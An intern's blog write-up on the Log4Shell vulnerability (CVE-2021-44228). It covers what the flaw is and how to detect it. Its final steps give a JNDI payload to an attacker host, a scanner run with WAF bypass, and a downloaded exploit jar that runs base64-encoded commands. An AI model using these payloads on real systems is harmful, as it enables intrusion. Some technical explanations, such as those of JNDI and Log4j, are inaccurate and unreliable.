Research on Log4JShell-CVE-2021–44228

3 min readJan 4, 2022

Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly given some interesting tasks, In my seventh task I was given to research about the recent CVE which shook the world of cybersecurity, all of you might know about, the LOg4jShell CVE-2021–44228.

What is Apache Log4J and why is this library so popular?

Apache Log4j is a Java-based logging utility which is part of the Apache Logging Services. This library is one of the easiest ways to log errors and bugs, and is used by the majority of Java developers. To understand this you need to understand two terms first, JNDI and Log4j.

JNDI is a plugin/component which helps transfer of data from a web application to an ldap server, every such request is carried out with the help of JNDI, and all of this information transfer is logged somewhere which is known as Log4j (hence it is a library).

Which versions of the Log4j library and Software are vulnerable ?

Apache Log4j2 versions between 2.0–2.14.1 are affected by these vulnerability.

Why is CVE-2021–44228 so dangerous?

This CVE is very dangerous as 90% of the softwares using this service are vulnerable to this, including smart watches, smart tv, games, etc. In short anything which uses Java might be vulnerable to this. This is the reason why many bug bounty programs and companies are paying double money to security researchers who find and report this vulnerability. In order for attackers to exploit the log4J vulnerability, they have to insert data into a log. That insertion point presumably comes from the Internet and If you have the credentials stored at that endpoint, the attacker can gain complete access to everything.

How can this vulnerability be detected?

This vulnerability can be detected with many methods, first of all the payload used will be something of format ${jndi:ldap//attacker.com/a}, where attacker.com is a attacker server. You can use burp collab link, dnslog.cn, interactsh server and my favourite http://canarytokens.org/generate to get payload ready.

Step 1 : You can form payload by following steps:

a. Go to http://canarytokens.org/generate

b. Select the token type as Log4j , enter email address and then name.

c. Click on generate and payload will be ready.

Step-2 : Hunting

1)Detection via Manual Method: You have to put the payload at every point where you think there will be a server interaction or logging service for eg, support requests, chat service, Writing a Review, etc. Put payload and wait for it to fire up. Once it is fired up you will get mail and once you get the mail then it is vulnerable to Log4j RCE.

2) Detection via Template: You can use nuclei template to find this vulnerability via templates present on https://github.com/numanturle/Log4jNuclei

3) Detection via Automation: You can automate the process of hunting for Log4j by the script available here: https://github.com/fullhunt/log4j-scan

Command: $ python3 log4j-scan.py -l urls.txt — headers-file headers-large.txt — waf-bypass — run-all-tests

With the above command you can test for maximum cases for log4 including headers and WAF Bypass techniques.

Step-3 : Further Exploitation

1. Download following zip file: https://anonfiles.com/xd07G204v9/JNDIExploit.v1.2_zip and unzip it.

2. Start LDAP server via following command:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i YOUR_PUBLIC_IP -p 1234

3. Now inject the payload creating in such following way

${jndi:ldap://YOUR_PUBLIC_IP:1389/Basic/Command/Base64/BASE64_ENCODED_COMMAND}

What is the impact of this vulnerability?

Attackers who can control log messages or log message parameters can execute arbitrary code on the vulnerable server loaded from LDAP servers when message lookup substitution is enabled. Hence attackers can exfiltrate server information through this.